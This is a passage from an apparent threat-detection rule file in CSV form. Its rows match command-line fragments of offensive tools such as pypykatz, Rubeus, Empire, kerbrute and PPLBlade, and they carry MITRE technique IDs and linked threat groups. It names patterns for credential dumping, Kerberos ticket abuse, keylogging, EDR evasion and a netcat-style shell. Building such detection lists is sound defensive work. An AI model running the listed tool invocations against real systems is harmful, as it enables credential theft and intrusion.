- T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1864" "* kerberos brute 
*.txt*",".{0,1000}\skerberos\sbrute\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1865" "* kerberos ccache del *.ccache*",".{0,1000}\skerberos\sccache\sdel\s.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1866" "* kerberos ccache exportkirbi *",".{0,1000}\skerberos\sccache\sexportkirbi\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1867" "* kerberos ccache list *.ccache*",".{0,1000}\skerberos\sccache\slist\s.{0,1000}\.ccache.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1868" "* kerberos ccache loadkirbi *",".{0,1000}\skerberos\sccache\sloadkirbi\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1869" "* kerberos ccache roast 
*",".{0,1000}\skerberos\sccache\sroast\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1870" "* kerberos keytab *.keytab*",".{0,1000}\skerberos\skeytab\s.{0,1000}\.keytab.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1871" "* kerberos kirbi parse *",".{0,1000}\skerberos\skirbi\sparse\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1872" "* kerberos spnroast *",".{0,1000}\skerberos\sspnroast\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","1873" "* kerberos tgt *kerberos+rc4://*:*@*",".{0,1000}\skerberos\stgt\s.{0,1000}kerberos\+rc4\:\/\/.{0,1000}\:.{0,1000}\@.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1874" "* kerberos.py*",".{0,1000}\skerberos\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","1875" "* kerbrute.py*",".{0,1000}\skerbrute\.py.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","10","2872","438","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z","1876" "* --key examples/conspicuous.priv --isconspicuous*",".{0,1000}\s\-\-key\sexamples\/conspicuous\.priv\s\-\-isconspicuous.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1877" "* --key PPLBlade*",".{0,1000}\s\-\-key\sPPLBlade.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process 
Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","1878" "* KeyCredentialLink.ps1*",".{0,1000}\sKeyCredentialLink\.ps1.{0,1000}","offensive_tool_keyword","KeyCredentialLink","Add Shadow Credentials to a target object by editing their msDS-KeyCredentialLink attribute","T1098 - T1550","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/Leo4j/KeyCredentialLink","1","0","N/A","N/A","10","1","21","3","2024-06-05T13:44:39Z","2024-06-05T13:19:49Z","1879" "* keylogger *",".{0,1000}\skeylogger\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","1880" "* KeyLogger.ahk*",".{0,1000}\sKeyLogger\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - 
TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","1881" "* --keyword * --check --ocr * --alexa*",".{0,1000}\s\-\-keyword\s.{0,1000}\s\-\-check\s\-\-ocr\s.{0,1000}\s\-\-alexa.{0,1000}","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","N/A","10","1587","292","2024-06-06T21:01:21Z","2017-03-01T11:16:26Z","1882" "* Killchain.ps1*",".{0,1000}\sKillchain\.ps1.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","1883" "* -KillDate *",".{0,1000}\s\-KillDate\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1884" "* -KillDays *",".{0,1000}\s\-KillDays\s.{0,1000}","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","1885" "* killer.cpp *",".{0,1000}\skiller\.cpp\s.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","1886" "* killer.exe*",".{0,1000}\skiller\.exe.{0,1000}","offensive_tool_keyword","killer","evade AVs and EDRs or security tools","T1564 - T1027 - T1070","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/0xHossam/Killer","1","0","N/A","N/A","10","9","804","128","2024-07-02T10:24:43Z","2023-04-08T16:29:52Z","1887" "* KillEvenlogService.ps1*",".{0,1000}\sKillEvenlogService\.ps1.{0,1000}","offensive_tool_keyword","EventLogMaster","Cobalt Strike Plugin - RDP Log Forensics & Clearing","T1070.001 - T1070.003 - T1070.004 - T1563.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/QAX-A-Team/EventLogMaster","1","0","N/A","N/A","6","4","361","73","2019-12-23T10:31:35Z","2019-12-17T05:07:09Z","1888" "* kimi.py *",".{0,1000}\skimi\.py\s.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","1889" "* KittyStager*",".{0,1000}\sKittyStager.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use them with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","1890" "* klg.ps1 *",".{0,1000}\sklg\.ps1\s.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","1891" "* klist * /service:*",".{0,1000}\sklist\s.{0,1000}\s\/service\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpy's Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUX's MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","1892" "* knowsmore.cmd.wordlist*",".{0,1000}\sknowsmore\.cmd\.wordlist.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1893" "* knowsmore.cmdbase*",".{0,1000}\sknowsmore\.cmdbase.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1894" "* knowsmore.config*",".{0,1000}\sknowsmore\.config.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1895" "* 
knowsmore.knowsmore*",".{0,1000}\sknowsmore\.knowsmore.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1896" "* knowsmore.libs.bloodhoundsync*",".{0,1000}\sknowsmore\.libs\.bloodhoundsync.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1897" "* knowsmore.libs.exporterbase*",".{0,1000}\sknowsmore\.libs\.exporterbase.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1898" "* knowsmore.libs.ntdsuseraccount*",".{0,1000}\sknowsmore\.libs\.ntdsuseraccount.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential 
Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1899" "* knowsmore.module*",".{0,1000}\sknowsmore\.module.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1900" "* knowsmore.password*",".{0,1000}\sknowsmore\.password.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1901" "* knowsmore.py*",".{0,1000}\sknowsmore\.py.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1902" "* knowsmore.util.color*",".{0,1000}\sknowsmore\.util\.color.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential 
Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1903" "* knowsmore.util.database*",".{0,1000}\sknowsmore\.util\.database.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1904" "* knowsmore.util.knowsmoredb*",".{0,1000}\sknowsmore\.util\.knowsmoredb.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1905" "* knowsmore.util.logger*",".{0,1000}\sknowsmore\.util\.logger.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1906" "* knowsmore.util.process*",".{0,1000}\sknowsmore\.util\.process.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - 
TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1907" "* knowsmore.util.tools*",".{0,1000}\sknowsmore\.util\.tools.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","1908" "* knx-gateway-discover.nse*",".{0,1000}\sknx\-gateway\-discover\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1909" "* knx-gateway-info.nse*",".{0,1000}\sknx\-gateway\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1910" "* KRB hijacking module *",".{0,1000}\sKRB\shijacking\smodule\s.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","1911" "* krb5-enum-users.nse*",".{0,1000}\skrb5\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1912" "* --krbpass * --krbsalt * -t * --escalate-user *",".{0,1000}\s\-\-krbpass\s.{0,1000}\s\-\-krbsalt\s.{0,1000}\s\-t\s.{0,1000}\s\-\-escalate\-user\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","1913" "* --krbpass 
*--krbsalt*",".{0,1000}\s\-\-krbpass\s.{0,1000}\-\-krbsalt.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","N/A","10","1281","181","2025-01-27T09:22:54Z","2019-01-08T18:42:07Z","1914" "* KrbRelay.HiveParser*",".{0,1000}\sKrbRelay\.HiveParser.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#content","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","1915" "* KRBUACBypass*",".{0,1000}\sKRBUACBypass.{0,1000}","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","N/A","8","5","496","62","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z","1916" "* -l nmapRssuilt.xml -v*",".{0,1000}\s\-l\snmapRssuilt\.xml\s\-v.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","0","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","1917" "* -l -p * -e cmd 